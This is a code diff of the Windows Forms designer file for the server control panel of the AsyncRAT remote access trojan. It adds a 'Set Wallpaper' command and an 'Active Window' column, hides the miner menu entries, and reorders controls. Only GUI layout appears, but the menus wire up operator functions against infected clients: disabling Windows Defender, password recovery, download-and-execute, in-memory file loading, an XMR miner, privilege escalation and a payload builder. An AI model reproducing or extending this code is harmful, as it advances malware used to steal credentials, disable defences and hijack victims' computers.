+ this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tODISKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
@@ -77,6 +112,7 @@
this.runToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
this.stopToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.setWallpaperToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.systemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.clientToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.closeToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
@@ -89,46 +125,11 @@
this.logoffToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.restartToolStripMenuItem3 = new System.Windows.Forms.ToolStripMenuItem();
this.shutdownToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.toolStripSeparator1 = new System.Windows.Forms.ToolStripSeparator();
this.serverToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.blockClientsToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.toolStripSeparator5 = new System.Windows.Forms.ToolStripSeparator();
this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.statusStrip1 = new System.Windows.Forms.StatusStrip();
- this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
- this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
- this.ping = new System.Windows.Forms.Timer(this.components);
- this.UpdateUI = new System.Windows.Forms.Timer(this.components);
- this.tabControl1 = new System.Windows.Forms.TabControl();
- this.tabPage1 = new System.Windows.Forms.TabPage();
- this.tabPage2 = new System.Windows.Forms.TabPage();
- this.listView2 = new System.Windows.Forms.ListView();
- this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.contextMenuLogs = new System.Windows.Forms.ContextMenuStrip(this.components);
- this.cLEARToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.tabPage3 = new System.Windows.Forms.TabPage();
- this.listView3 = new System.Windows.Forms.ListView();
- this.contextMenuThumbnail = new System.Windows.Forms.ContextMenuStrip(this.components);
this.sTARTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.ThumbnailImageList = new System.Windows.Forms.ImageList(this.components);
- this.tabPage4 = new System.Windows.Forms.TabPage();
- this.listView4 = new System.Windows.Forms.ListView();
- this.columnHeader4 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.columnHeader5 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.contextMenuTasks = new System.Windows.Forms.ContextMenuStrip(this.components);
- this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.downloadAndExecuteToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.sENDFILETOMEMORYToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.minerToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.uPDATEToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
- this.dELETETASKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
- this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
- this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
- this.TimerTask = new System.Windows.Forms.Timer(this.components);
this.contextMenuClient.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.tabControl1.SuspendLayout();
@@ -157,7 +158,7 @@
this.lv_admin,
this.lv_av,
this.lv_ping,
- this.lv_prefor});
+ this.lv_act});
this.listView1.ContextMenuStrip = this.contextMenuClient;
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView1.FullRowSelect = true;
@@ -224,10 +225,10 @@
//
this.lv_ping.Text = "Ping";
//
- // lv_prefor
+ // lv_act
//
- this.lv_prefor.Text = "Miner";
- this.lv_prefor.Width = 200;
+ this.lv_act.Text = "Active Window";
+ this.lv_act.Width = 350;
//
// contextMenuClient
//
@@ -247,6 +248,302 @@
this.contextMenuClient.Name = "contextMenuStrip1";
this.contextMenuClient.Size = new System.Drawing.Size(203, 278);
//
+ // toolStripSeparator2
+ //
+ this.toolStripSeparator2.Name = "toolStripSeparator2";
+ this.toolStripSeparator2.Size = new System.Drawing.Size(199, 6);
+ //
+ // toolStripSeparator1
+ //
+ this.toolStripSeparator1.Name = "toolStripSeparator1";
+ this.toolStripSeparator1.Size = new System.Drawing.Size(199, 6);
+ //
+ // toolStripSeparator5
+ //
+ this.toolStripSeparator5.Name = "toolStripSeparator5";
+ this.toolStripSeparator5.Size = new System.Drawing.Size(199, 6);
+ //
+ // statusStrip1
+ //
+ this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.toolStripStatusLabel1,
+ this.toolStripStatusLabel2});
+ this.statusStrip1.Location = new System.Drawing.Point(0, 479);
+ this.statusStrip1.Name = "statusStrip1";
+ this.statusStrip1.Size = new System.Drawing.Size(1301, 32);
+ this.statusStrip1.TabIndex = 1;
+ this.statusStrip1.Text = "statusStrip1";
+ //
+ // toolStripStatusLabel1
+ //
+ this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
+ this.toolStripStatusLabel1.Size = new System.Drawing.Size(24, 25);
+ this.toolStripStatusLabel1.Text = "...";
+ //
+ // toolStripStatusLabel2
+ //
+ this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
+ this.toolStripStatusLabel2.Size = new System.Drawing.Size(204, 25);
+ this.toolStripStatusLabel2.Text = " Notification";
+ this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
+ //
+ // ping
+ //
+ this.ping.Enabled = true;
+ this.ping.Interval = 30000;
+ this.ping.Tick += new System.EventHandler(this.ping_Tick);
+ //
+ // UpdateUI
+ //
+ this.UpdateUI.Enabled = true;
+ this.UpdateUI.Interval = 500;
+ this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
+ //
+ // tabControl1
+ //
+ this.tabControl1.Controls.Add(this.tabPage1);
+ this.tabControl1.Controls.Add(this.tabPage2);
+ this.tabControl1.Controls.Add(this.tabPage3);
+ this.tabControl1.Controls.Add(this.tabPage4);
+ this.tabControl1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.tabControl1.Location = new System.Drawing.Point(0, 0);
+ this.tabControl1.Name = "tabControl1";
+ this.tabControl1.SelectedIndex = 0;
+ this.tabControl1.Size = new System.Drawing.Size(1301, 479);
+ this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
+ this.tabControl1.TabIndex = 2;
+ //
+ // tabPage1
+ //
+ this.tabPage1.Controls.Add(this.listView1);
+ this.tabPage1.Location = new System.Drawing.Point(4, 29);
+ this.tabPage1.Name = "tabPage1";
+ this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage1.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage1.TabIndex = 0;
+ this.tabPage1.Text = "Clients";
+ //
+ // tabPage2
+ //
+ this.tabPage2.Controls.Add(this.listView2);
+ this.tabPage2.Location = new System.Drawing.Point(4, 29);
+ this.tabPage2.Name = "tabPage2";
+ this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage2.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage2.TabIndex = 1;
+ this.tabPage2.Text = "Logs";
+ this.tabPage2.UseVisualStyleBackColor = true;
+ //
+ // listView2
+ //
+ this.listView2.BorderStyle = System.Windows.Forms.BorderStyle.None;
+ this.listView2.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.columnHeader1,
+ this.columnHeader2});
+ this.listView2.ContextMenuStrip = this.contextMenuLogs;
+ this.listView2.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView2.FullRowSelect = true;
+ this.listView2.GridLines = true;
+ this.listView2.HideSelection = false;
+ this.listView2.Location = new System.Drawing.Point(3, 3);
+ this.listView2.Name = "listView2";
+ this.listView2.ShowGroups = false;
+ this.listView2.ShowItemToolTips = true;
+ this.listView2.Size = new System.Drawing.Size(1287, 440);
+ this.listView2.TabIndex = 1;
+ this.listView2.UseCompatibleStateImageBehavior = false;
+ this.listView2.View = System.Windows.Forms.View.Details;
+ //
+ // columnHeader1
+ //
+ this.columnHeader1.Text = "Time";
+ this.columnHeader1.Width = 150;
+ //
+ // columnHeader2
+ //
+ this.columnHeader2.Text = "Message";
+ this.columnHeader2.Width = 705;
+ //
+ // contextMenuLogs
+ //
+ this.contextMenuLogs.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.contextMenuLogs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.cLEARToolStripMenuItem});
+ this.contextMenuLogs.Name = "contextMenuLogs";
+ this.contextMenuLogs.ShowImageMargin = false;
+ this.contextMenuLogs.Size = new System.Drawing.Size(111, 36);
+ //
+ // cLEARToolStripMenuItem
+ //
+ this.cLEARToolStripMenuItem.Name = "cLEARToolStripMenuItem";
+ this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(110, 32);
+ this.cLEARToolStripMenuItem.Text = "CLEAR";
+ this.cLEARToolStripMenuItem.Click += new System.EventHandler(this.CLEARToolStripMenuItem_Click);
+ //
+ // tabPage3
+ //
+ this.tabPage3.Controls.Add(this.listView3);
+ this.tabPage3.Location = new System.Drawing.Point(4, 29);
+ this.tabPage3.Name = "tabPage3";
+ this.tabPage3.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage3.TabIndex = 2;
+ this.tabPage3.Text = "Thumbnail";
+ this.tabPage3.UseVisualStyleBackColor = true;
+ //
+ // listView3
+ //
+ this.listView3.ContextMenuStrip = this.contextMenuThumbnail;
+ this.listView3.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView3.HideSelection = false;
+ this.listView3.LargeImageList = this.ThumbnailImageList;
+ this.listView3.Location = new System.Drawing.Point(0, 0);
+ this.listView3.Name = "listView3";
+ this.listView3.ShowItemToolTips = true;
+ this.listView3.Size = new System.Drawing.Size(1293, 446);
+ this.listView3.SmallImageList = this.ThumbnailImageList;
+ this.listView3.TabIndex = 0;
+ this.listView3.UseCompatibleStateImageBehavior = false;
+ //
+ // contextMenuThumbnail
+ //
+ this.contextMenuThumbnail.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.contextMenuThumbnail.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.sTARTToolStripMenuItem,
+ this.sTOPToolStripMenuItem});
+ this.contextMenuThumbnail.Name = "contextMenuStrip2";
+ this.contextMenuThumbnail.Size = new System.Drawing.Size(144, 68);
+ //
+ // ThumbnailImageList
+ //
+ this.ThumbnailImageList.ColorDepth = System.Windows.Forms.ColorDepth.Depth16Bit;
+ this.ThumbnailImageList.ImageSize = new System.Drawing.Size(256, 256);
+ this.ThumbnailImageList.TransparentColor = System.Drawing.Color.Transparent;
+ //
+ // tabPage4
+ //
+ this.tabPage4.Controls.Add(this.listView4);
+ this.tabPage4.Location = new System.Drawing.Point(4, 29);
+ this.tabPage4.Name = "tabPage4";
+ this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage4.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage4.TabIndex = 3;
+ this.tabPage4.Text = "Tasks";
+ this.tabPage4.UseVisualStyleBackColor = true;
+ //
+ // listView4
+ //
+ this.listView4.BorderStyle = System.Windows.Forms.BorderStyle.None;
+ this.listView4.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.columnHeader4,
+ this.columnHeader5});
+ this.listView4.ContextMenuStrip = this.contextMenuTasks;
+ this.listView4.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView4.FullRowSelect = true;
+ this.listView4.HideSelection = false;
+ this.listView4.Location = new System.Drawing.Point(3, 3);
+ this.listView4.Name = "listView4";
+ this.listView4.Size = new System.Drawing.Size(1287, 440);
+ this.listView4.TabIndex = 0;
+ this.listView4.UseCompatibleStateImageBehavior = false;
+ this.listView4.View = System.Windows.Forms.View.Details;
+ //
+ // columnHeader4
+ //
+ this.columnHeader4.Text = "Task";
+ this.columnHeader4.Width = 97;
+ //
+ // columnHeader5
+ //
+ this.columnHeader5.Text = "Execution";
+ this.columnHeader5.Width = 116;
+ //
+ // contextMenuTasks
+ //
+ this.contextMenuTasks.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.contextMenuTasks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.pASSWORDRECOVERYToolStripMenuItem,
+ this.downloadAndExecuteToolStripMenuItem,
+ this.sENDFILETOMEMORYToolStripMenuItem1,
+ this.minerToolStripMenuItem1,
+ this.uPDATEToolStripMenuItem1,
+ this.toolStripSeparator4,
+ this.dELETETASKToolStripMenuItem});
+ this.contextMenuTasks.Name = "contextMenuStrip4";
+ this.contextMenuTasks.ShowImageMargin = false;
+ this.contextMenuTasks.Size = new System.Drawing.Size(250, 202);
+ //
+ // pASSWORDRECOVERYToolStripMenuItem
+ //
+ this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem";
+ this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
+ this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY";
+ this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click);
+ //
+ // downloadAndExecuteToolStripMenuItem
+ //
+ this.downloadAndExecuteToolStripMenuItem.Name = "downloadAndExecuteToolStripMenuItem";
+ this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
+ this.downloadAndExecuteToolStripMenuItem.Text = "SEND FILE TO DISK";
+ this.downloadAndExecuteToolStripMenuItem.Click += new System.EventHandler(this.DownloadAndExecuteToolStripMenuItem_Click);
+ //
+ // sENDFILETOMEMORYToolStripMenuItem1
+ //
+ this.sENDFILETOMEMORYToolStripMenuItem1.Name = "sENDFILETOMEMORYToolStripMenuItem1";
+ this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
+ this.sENDFILETOMEMORYToolStripMenuItem1.Text = "SEND FILE TO MEMORY";
+ this.sENDFILETOMEMORYToolStripMenuItem1.Click += new System.EventHandler(this.SENDFILETOMEMORYToolStripMenuItem1_Click);
+ //
+ // minerToolStripMenuItem1
+ //
+ this.minerToolStripMenuItem1.Name = "minerToolStripMenuItem1";
+ this.minerToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
+ this.minerToolStripMenuItem1.Text = "XMR MINER";
+ this.minerToolStripMenuItem1.Visible = false;
+ this.minerToolStripMenuItem1.Click += new System.EventHandler(this.MinerToolStripMenuItem1_Click);
+ //
+ // uPDATEToolStripMenuItem1
+ //
+ this.uPDATEToolStripMenuItem1.Name = "uPDATEToolStripMenuItem1";
+ this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
+ this.uPDATEToolStripMenuItem1.Text = "UPDATE ALL CLIENTS";
+ this.uPDATEToolStripMenuItem1.Click += new System.EventHandler(this.UPDATEToolStripMenuItem1_Click);
+ //
+ // toolStripSeparator4
+ //
+ this.toolStripSeparator4.Name = "toolStripSeparator4";
+ this.toolStripSeparator4.Size = new System.Drawing.Size(246, 6);
+ //
+ // dELETETASKToolStripMenuItem
+ //
+ this.dELETETASKToolStripMenuItem.Name = "dELETETASKToolStripMenuItem";
+ this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
+ this.dELETETASKToolStripMenuItem.Text = "DELETE TASK";
+ this.dELETETASKToolStripMenuItem.Click += new System.EventHandler(this.DELETETASKToolStripMenuItem_Click);
+ //
+ // performanceCounter1
+ //
+ this.performanceCounter1.CategoryName = "Processor";
+ this.performanceCounter1.CounterName = "% Processor Time";
+ this.performanceCounter1.InstanceName = "_Total";
+ //
+ // performanceCounter2
+ //
+ this.performanceCounter2.CategoryName = "Memory";
+ this.performanceCounter2.CounterName = "% Committed Bytes In Use";
+ //
+ // notifyIcon1
+ //
+ this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
+ this.notifyIcon1.Text = "AsyncRAT";
+ this.notifyIcon1.Visible = true;
+ //
+ // TimerTask
+ //
+ this.TimerTask.Enabled = true;
+ this.TimerTask.Interval = 5000;
+ this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
+ //
// aBOUTToolStripMenuItem
//
this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info;
@@ -255,11 +552,6 @@
this.aBOUTToolStripMenuItem.Text = "ABOUT";
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
//
- // toolStripSeparator2
- //
- this.toolStripSeparator2.Name = "toolStripSeparator2";
- this.toolStripSeparator2.Size = new System.Drawing.Size(199, 6);
- //
// sENDFILEToolStripMenuItem
//
this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -445,6 +737,7 @@
this.xMRMinerToolStripMenuItem.Name = "xMRMinerToolStripMenuItem";
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.xMRMinerToolStripMenuItem.Text = "XMR Miner";
+ this.xMRMinerToolStripMenuItem.Visible = false;
//
// runToolStripMenuItem
//
@@ -470,7 +763,8 @@
this.chatToolStripMenuItem1,
this.getAdminPrivilegesToolStripMenuItem,
this.blankScreenToolStripMenuItem,
- this.disableWindowsDefenderToolStripMenuItem});
+ this.disableWindowsDefenderToolStripMenuItem,
+ this.setWallpaperToolStripMenuItem});
this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra;
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
this.extraToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
@@ -542,6 +836,14 @@
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
this.disableWindowsDefenderToolStripMenuItem.Click += new System.EventHandler(this.DisableWindowsDefenderToolStripMenuItem_Click_1);
//
+ // setWallpaperToolStripMenuItem
+ //
+ this.setWallpaperToolStripMenuItem.Image = global::Server.Properties.Resources.iconfinder_32_171485__1_;
+ this.setWallpaperToolStripMenuItem.Name = "setWallpaperToolStripMenuItem";
+ this.setWallpaperToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
+ this.setWallpaperToolStripMenuItem.Text = "Set Wallpaper";
+ this.setWallpaperToolStripMenuItem.Click += new System.EventHandler(this.setWallpaperToolStripMenuItem_Click);
+ //
// systemToolStripMenuItem
//
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -638,11 +940,6 @@
this.shutdownToolStripMenuItem1.Text = "Shutdown";
this.shutdownToolStripMenuItem1.Click += new System.EventHandler(this.ShutdownToolStripMenuItem1_Click);
//
- // toolStripSeparator1
- //
- this.toolStripSeparator1.Name = "toolStripSeparator1";
- this.toolStripSeparator1.Size = new System.Drawing.Size(199, 6);
- //
// serverToolStripMenuItem
//
this.serverToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -660,11 +957,6 @@
this.blockClientsToolStripMenuItem.Text = "Block Clients";
this.blockClientsToolStripMenuItem.Click += new System.EventHandler(this.BlockClientsToolStripMenuItem_Click);
//
- // toolStripSeparator5
- //
- this.toolStripSeparator5.Name = "toolStripSeparator5";
- this.toolStripSeparator5.Size = new System.Drawing.Size(199, 6);
- //
// bUILDERToolStripMenuItem
//
this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder;
@@ -673,157 +965,6 @@
this.bUILDERToolStripMenuItem.Text = "BUILDER";
this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click);
//
- // statusStrip1
- //
- this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.toolStripStatusLabel1,
- this.toolStripStatusLabel2});
- this.statusStrip1.Location = new System.Drawing.Point(0, 479);
- this.statusStrip1.Name = "statusStrip1";
- this.statusStrip1.Size = new System.Drawing.Size(1301, 32);
- this.statusStrip1.TabIndex = 1;
- this.statusStrip1.Text = "statusStrip1";
- //
- // toolStripStatusLabel1
- //
- this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
- this.toolStripStatusLabel1.Size = new System.Drawing.Size(24, 25);
- this.toolStripStatusLabel1.Text = "...";
- //
- // toolStripStatusLabel2
- //
- this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
- this.toolStripStatusLabel2.Size = new System.Drawing.Size(204, 25);
- this.toolStripStatusLabel2.Text = " Notification";
- this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
- //
- // ping
- //
- this.ping.Enabled = true;
- this.ping.Interval = 30000;
- this.ping.Tick += new System.EventHandler(this.ping_Tick);
- //
- // UpdateUI
- //
- this.UpdateUI.Enabled = true;
- this.UpdateUI.Interval = 500;
- this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
- //
- // tabControl1
- //
- this.tabControl1.Controls.Add(this.tabPage1);
- this.tabControl1.Controls.Add(this.tabPage2);
- this.tabControl1.Controls.Add(this.tabPage3);
- this.tabControl1.Controls.Add(this.tabPage4);
- this.tabControl1.Dock = System.Windows.Forms.DockStyle.Fill;
- this.tabControl1.Location = new System.Drawing.Point(0, 0);
- this.tabControl1.Name = "tabControl1";
- this.tabControl1.SelectedIndex = 0;
- this.tabControl1.Size = new System.Drawing.Size(1301, 479);
- this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
- this.tabControl1.TabIndex = 2;
- //
- // tabPage1
- //
- this.tabPage1.Controls.Add(this.listView1);
- this.tabPage1.Location = new System.Drawing.Point(4, 29);
- this.tabPage1.Name = "tabPage1";
- this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage1.Size = new System.Drawing.Size(1293, 446);
- this.tabPage1.TabIndex = 0;
- this.tabPage1.Text = "Clients";
- //
- // tabPage2
- //
- this.tabPage2.Controls.Add(this.listView2);
- this.tabPage2.Location = new System.Drawing.Point(4, 29);
- this.tabPage2.Name = "tabPage2";
- this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage2.Size = new System.Drawing.Size(1293, 446);
- this.tabPage2.TabIndex = 1;
- this.tabPage2.Text = "Logs";
- this.tabPage2.UseVisualStyleBackColor = true;
- //
- // listView2
- //
- this.listView2.BorderStyle = System.Windows.Forms.BorderStyle.None;
- this.listView2.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
- this.columnHeader1,
- this.columnHeader2});
- this.listView2.ContextMenuStrip = this.contextMenuLogs;
- this.listView2.Dock = System.Windows.Forms.DockStyle.Fill;
- this.listView2.FullRowSelect = true;
- this.listView2.GridLines = true;
- this.listView2.HideSelection = false;
- this.listView2.Location = new System.Drawing.Point(3, 3);
- this.listView2.Name = "listView2";
- this.listView2.ShowGroups = false;
- this.listView2.ShowItemToolTips = true;
- this.listView2.Size = new System.Drawing.Size(1287, 440);
- this.listView2.TabIndex = 1;
- this.listView2.UseCompatibleStateImageBehavior = false;
- this.listView2.View = System.Windows.Forms.View.Details;
- //
- // columnHeader1
- //
- this.columnHeader1.Text = "Time";
- this.columnHeader1.Width = 150;
- //
- // columnHeader2
- //
- this.columnHeader2.Text = "Message";
- this.columnHeader2.Width = 705;
- //
- // contextMenuLogs
- //
- this.contextMenuLogs.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.contextMenuLogs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.cLEARToolStripMenuItem});
- this.contextMenuLogs.Name = "contextMenuLogs";
- this.contextMenuLogs.ShowImageMargin = false;
- this.contextMenuLogs.Size = new System.Drawing.Size(111, 36);
- //
- // cLEARToolStripMenuItem
- //
- this.cLEARToolStripMenuItem.Name = "cLEARToolStripMenuItem";
- this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(110, 32);
- this.cLEARToolStripMenuItem.Text = "CLEAR";
- this.cLEARToolStripMenuItem.Click += new System.EventHandler(this.CLEARToolStripMenuItem_Click);
- //
- // tabPage3
- //
- this.tabPage3.Controls.Add(this.listView3);
- this.tabPage3.Location = new System.Drawing.Point(4, 29);
- this.tabPage3.Name = "tabPage3";
- this.tabPage3.Size = new System.Drawing.Size(1293, 446);
- this.tabPage3.TabIndex = 2;
- this.tabPage3.Text = "Thumbnail";
- this.tabPage3.UseVisualStyleBackColor = true;
- //
- // listView3
- //
- this.listView3.ContextMenuStrip = this.contextMenuThumbnail;
- this.listView3.Dock = System.Windows.Forms.DockStyle.Fill;
- this.listView3.HideSelection = false;
- this.listView3.LargeImageList = this.ThumbnailImageList;
- this.listView3.Location = new System.Drawing.Point(0, 0);
- this.listView3.Name = "listView3";
- this.listView3.ShowItemToolTips = true;
- this.listView3.Size = new System.Drawing.Size(1293, 446);
- this.listView3.SmallImageList = this.ThumbnailImageList;
- this.listView3.TabIndex = 0;
- this.listView3.UseCompatibleStateImageBehavior = false;
- //
- // contextMenuThumbnail
- //
- this.contextMenuThumbnail.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.contextMenuThumbnail.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.sTARTToolStripMenuItem,
- this.sTOPToolStripMenuItem});
- this.contextMenuThumbnail.Name = "contextMenuStrip2";
- this.contextMenuThumbnail.Size = new System.Drawing.Size(144, 68);
- //
// sTARTToolStripMenuItem
//
this.sTARTToolStripMenuItem.Image = global::Server.Properties.Resources.play_button;
@@ -840,135 +981,6 @@
this.sTOPToolStripMenuItem.Text = "STOP";
this.sTOPToolStripMenuItem.Click += new System.EventHandler(this.STOPToolStripMenuItem_Click);
//
- // ThumbnailImageList
- //
- this.ThumbnailImageList.ColorDepth = System.Windows.Forms.ColorDepth.Depth16Bit;
- this.ThumbnailImageList.ImageSize = new System.Drawing.Size(256, 256);
- this.ThumbnailImageList.TransparentColor = System.Drawing.Color.Transparent;
- //
- // tabPage4
- //
- this.tabPage4.Controls.Add(this.listView4);
- this.tabPage4.Location = new System.Drawing.Point(4, 29);
- this.tabPage4.Name = "tabPage4";
- this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage4.Size = new System.Drawing.Size(1293, 446);
- this.tabPage4.TabIndex = 3;
- this.tabPage4.Text = "Tasks";
- this.tabPage4.UseVisualStyleBackColor = true;
- //
- // listView4
- //
- this.listView4.BorderStyle = System.Windows.Forms.BorderStyle.None;
- this.listView4.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
- this.columnHeader4,
- this.columnHeader5});
- this.listView4.ContextMenuStrip = this.contextMenuTasks;
- this.listView4.Dock = System.Windows.Forms.DockStyle.Fill;
- this.listView4.FullRowSelect = true;
- this.listView4.HideSelection = false;
- this.listView4.Location = new System.Drawing.Point(3, 3);
- this.listView4.Name = "listView4";
- this.listView4.Size = new System.Drawing.Size(1287, 440);
- this.listView4.TabIndex = 0;
- this.listView4.UseCompatibleStateImageBehavior = false;
- this.listView4.View = System.Windows.Forms.View.Details;
- //
- // columnHeader4
- //
- this.columnHeader4.Text = "Task";
- this.columnHeader4.Width = 97;
- //
- // columnHeader5
- //
- this.columnHeader5.Text = "Execution";
- this.columnHeader5.Width = 116;
- //
- // contextMenuTasks
- //
- this.contextMenuTasks.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.contextMenuTasks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.pASSWORDRECOVERYToolStripMenuItem,
- this.downloadAndExecuteToolStripMenuItem,
- this.sENDFILETOMEMORYToolStripMenuItem1,
- this.minerToolStripMenuItem1,
- this.uPDATEToolStripMenuItem1,
- this.toolStripSeparator4,
- this.dELETETASKToolStripMenuItem});
- this.contextMenuTasks.Name = "contextMenuStrip4";
- this.contextMenuTasks.ShowImageMargin = false;
- this.contextMenuTasks.Size = new System.Drawing.Size(250, 202);
- //
- // pASSWORDRECOVERYToolStripMenuItem
- //
- this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem";
- this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
- this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY";
- this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click);
- //
- // downloadAndExecuteToolStripMenuItem
- //
- this.downloadAndExecuteToolStripMenuItem.Name = "downloadAndExecuteToolStripMenuItem";
- this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
- this.downloadAndExecuteToolStripMenuItem.Text = "SEND FILE TO DISK";
